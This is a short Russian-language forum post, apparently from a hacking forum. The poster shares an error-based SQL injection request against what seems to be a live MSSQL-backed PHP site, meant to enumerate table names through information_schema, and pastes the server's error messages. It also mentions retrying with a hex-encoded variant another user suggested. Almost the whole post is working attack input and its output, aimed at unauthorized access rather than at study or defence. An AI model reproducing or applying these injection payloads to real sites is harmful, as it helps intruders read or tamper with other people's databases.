вот запрос
id=1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegmentssyssegments','syssegmentssyssegmentssysse gments')))--
ответ
Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'. (severity 16)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
message: Invalid column name имя калонки неверно...
'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'-хм мож админы извращенцы так таблицы называть??
попробовал то что мне скаща scipio
ответ
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource